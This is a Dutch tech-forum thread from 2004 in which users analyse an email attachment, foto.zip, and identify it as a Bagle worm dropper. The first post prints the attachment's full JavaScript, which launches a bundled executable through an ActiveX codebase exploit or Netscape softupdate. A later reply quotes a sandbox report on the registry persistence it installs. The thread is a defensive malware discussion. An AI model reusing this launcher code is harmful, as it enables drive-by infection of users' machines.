Toon posts:

[Malware] Nieuwe Baglevariant - foto.zip

Pagina: 1
Acties:

woensdag 1 september 2004 00:23

Acties:
  • Occy74
  • Registratie: September 2000
  • Laatst online: 16-11 19:01

Occy74

Topicstarter
Kreeg net een mailtje met foto.zip als attachment van een onbekende, dit vertrouw ik uiteraard niet dus eerst de zip gescand met Kaspersky Personal 5, niks gevonden..
Zip is 5kb en er zit een html-file in.
Als ik die html-file bekijk met ultraedit staat er het volgende in:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

<head>
<script language="JavaScript">
var exepath='foto/foto1.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
ewetfttg = "trgfygddfgg";
hfgyghg = "ewretrtyrtyrt";
var bver=parseInt(navigator.appVersion);

function install() {
        if ( navigator.platform && navigator.platform != 'Win32' ) {
                location.replace('NOTWIN32WARNING.html');
                return;
        }
        if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D"   codebase="'+exepath+'"></object>');
        } else if (bname == 'Netscape' && bver >= 4) {
                trigger = netscape.softupdate.Trigger;
                if (trigger.UpdateEnabled) {
                        trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
                } else {
                        location.replace(exepath);
                }
        } else {
                location.replace(exepath);
        }
}

install();

// -->
</script>
</head>


Iemand enig idee wat dit doet?
Lijkt op een of ander javascript die foto1.exe download en uitvoert oid.

Wie interesse heeft in de zipfile, hij staat Edit Schouw: nergens meer, doe maar niet. :)

[ Voor 3% gewijzigd door Verwijderd op 01-09-2004 00:28 ]

Systeem Specs

woensdag 1 september 2004 00:28

Acties:
  • Voutloos
  • Registratie: Januari 2002
  • Niet online

Voutloos

Ja, klopt. Hij start idd foto/foto.exe
Deze zit ook in de zip.

Edit van schouw lijkt me terecht, want het ziet er erg fout uit...

{signature}

woensdag 1 september 2004 00:29

Acties:
  • RikTW
  • Registratie: Januari 2004
  • Laatst online: 01-12 18:06

RikTW

Volgens mijn McAfee (4.5.1 SP 1, Dats: 4388 (oeps, t wordt weer eens tijd), engine 4320) is t een trojan: JS/|llWill of zo
edit:
pffieuw, net op tijd voor de edit van Schouw ^ ;)

[ Voor 22% gewijzigd door RikTW op 01-09-2004 00:33 ]

woensdag 1 september 2004 00:30

Acties:
  • CrashOne
  • Registratie: Juli 2000
  • Niet online

CrashOne

oOoOoOoOoOoOoOoOoOo

Hij download niks maar voert een bestand uit wat in een hidden map staat, dat is dus foto1.exe.

http://virusscan.jotti.dhs.org/
File: foto1.exe
Status:
INFECTED/MALWARE (Note: this file has been scanned before. Therefore, this file's scan results will not be stored in the database)
Packers detected:
None

AntiVir
No viruses found (1.16 seconds taken)
BitDefender
Trojan.Dropper.Small.KU (2.79 seconds taken)
ClamAV
No viruses found (6.39 seconds taken)
Dr.Web
Win32.HLLM.Beagle.9728 (6.39 seconds taken)
F-Prot Antivirus
dropper for W32/Mitglieder.AA (0.34 seconds taken)
F-Secure Anti-Virus
W32/Bagle.AK@mm, TrojanDropper.Win32.Small.kv (3.66 seconds taken)
Kaspersky Anti-Virus
TrojanDropper.Win32.Small.kv (3.85 seconds taken)
Norman Virus Control
Sandbox: W32/Malware; [ General information ]

* Creating several executable files on hard-drive.
* File length: 12800 bytes.

[ Changes to filesystem ]
* Creates file C:\\WINDOWS\\SYSTEM\\doriot.exe.
* Creates file C:\\WINDOWS\\SYSTEM\\gdqfw.exe.
* Deletes file C:\\WINDOWS\\_re_file.exe.

[ Changes to registry ]
* Creates value \"wersds.exe\"=\"C:\\WINDOWS\\SYSTEM\\doriot.exe\" in key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\".
* Creates value \"wersds.exe\"=\"C:\\WINDOWS\\SYSTEM\\doriot.exe\" in key \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\".

[ Process/window information ]
* Will automatically restart after boot (I (4.52 seconds taken)

Huur mij in als freelance SEO consultant!

woensdag 1 september 2004 00:31

Acties:

Verwijderd

Componenten van nieuwe Baglevariant.

De jsmeuk: Exploit.CodeBaseExec
foto.zip contains: Exploit.CodeBaseExec
Trojandropper.Win32.Small.kv

Titel wat aangepast.

Edit:
Kreeg net een mailtje met foto.zip als attachment van een onbekende, dit vertrouw ik uiteraard niet dus eerst de zip gescand met Kaspersky Personal 5, niks gevonden..
Vaker updaten, update hiervoor werd iets voor 23:30 gereleased. :)

[ Voor 44% gewijzigd door Verwijderd op 01-09-2004 00:35 ]

woensdag 1 september 2004 00:43

Acties:
  • Occy74
  • Registratie: September 2000
  • Laatst online: 16-11 19:01

Occy74

Topicstarter
Mja, merk het nu net..
Update gedaan en toen vond Kaspersky hem wel..
Naja had het toch niet uitgevoerd want het zag er al errug verdacht uit dus nix aan de hand.

Systeem Specs

Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq